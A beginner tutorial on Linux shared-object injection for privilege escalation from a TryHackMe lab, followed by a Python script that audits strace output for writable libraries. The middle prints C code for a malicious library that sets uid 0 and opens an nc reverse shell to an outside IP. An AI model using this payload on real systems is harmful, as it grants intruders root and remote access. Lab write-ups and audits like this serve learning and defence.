Linux Shared Object (.SO) Injection Privesc

Sayan Ray

Recently, I was solving the TryHackMe Linux Privilege Escalation Lab, where task 12 required me to do a shared object injection in order to gain higher privileges. But, at that time, I felt there weren’t a lot of helpful resources online for me to understand the concepts behind it. So, here is a shared object injection tutorial for beginners.

What are Shared Objects?

A shared library or shared object is a computer file that contains executable code designed to be used by multiple computer programs or other libraries at runtime. — Wikipedia

These files are generally located under a lib directory on Linux, for example /lib or /usr/lib. They generally carry the extension “.so”, for dynamically linked shared library objects.

A program loads these libraries in order to use their code, which promotes code reuse. These libraries are generally predefined, for example libc.so.

The term “libc” is commonly used as a shorthand for the “standard C library” a library of standard functions that can be used by all C programs. — Linux Manual

When a program tries to load a library on which we have write access, we can replace the library's code with malicious code, which then runs inside the host program at runtime. This is particularly useful if the host program runs with higher privileges (crontab, SUID, etc.): the malicious library can then act as a privilege escalation vector.

Checking For An Interesting Shared Library Object

strace /path/to/file 2>&1 | grep -iE 'open|access|no such file'

Here, if you find any library on which you have write access, you can craft a malicious library that will run with the privileges of the host program. The code is as follows:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>  // setuid()

// The constructor attribute makes func() run as soon as the library is loaded
static void func(void) __attribute__ ((constructor));

static void func(void) {
    setuid(0); // 0 uid is for root
    system("nc -e /bin/bash 10.17.33.221 4444");
}

Here, if netcat is not present on the system, transfer ncat.

Compilation

gcc -shared -fPIC -Wall -o /desired/path/to/library.so library.c

Now, when the program runs, this malicious library runs with higher privileges and provides you with a reverse shell.
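
From the defender's side, the same strace output can be audited for the write access this technique depends on. The following is an added example, not part of the original post: it flags libraries that are writable or not owned by a trusted user, and missing libraries whose nearest existing directory is. It assumes plain POSIX permission bits (no ACLs); the function names and the sample paths are constructed for illustration.

```python
import os
import re
import stat

# Quoted *.so or *.so.N path inside a strace line, e.g.
#   openat(AT_FDCWD, "/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
SO_PATH = re.compile(r'"(/[^"]*\.so(?:\.[0-9.]+)?)"')

def weak_perms(path, trusted_uids):
    """Return why an untrusted user could modify path, or None if it is tight."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"group/other writable (mode {stat.S_IMODE(st.st_mode):o})"
    return None

def audit(strace_text, trusted_uids=frozenset({0})):
    """Flag libraries a traced program looked up that untrusted users can
    overwrite (file check) or plant/replace (nearest existing directory check)."""
    findings, seen = [], set()
    for path in SO_PATH.findall(strace_text):
        if path in seen:
            continue
        seen.add(path)
        if os.path.exists(path):
            why = weak_perms(path, trusted_uids)
            if why:
                findings.append((path, f"library {why}"))
        parent = os.path.dirname(path)
        while not os.path.isdir(parent):   # missing lib: climb to a real directory
            parent = os.path.dirname(parent)
        why = weak_perms(parent, trusted_uids)
        if why:
            findings.append((path, f"directory {parent} {why}"))
    return findings

# Constructed sample in the shape of the strace output grepped above.
SAMPLE = '''\
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/opt/example/lib/libdemo.so", O_RDONLY) = -1 ENOENT (No such file or directory)
'''

if __name__ == "__main__":
    for path, why in audit(SAMPLE):
        print(f"{path}: {why}")
```

Any finding against a library used by a SUID binary or a root cron job should be fixed by making the file and its directory root-owned and not group or world writable.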
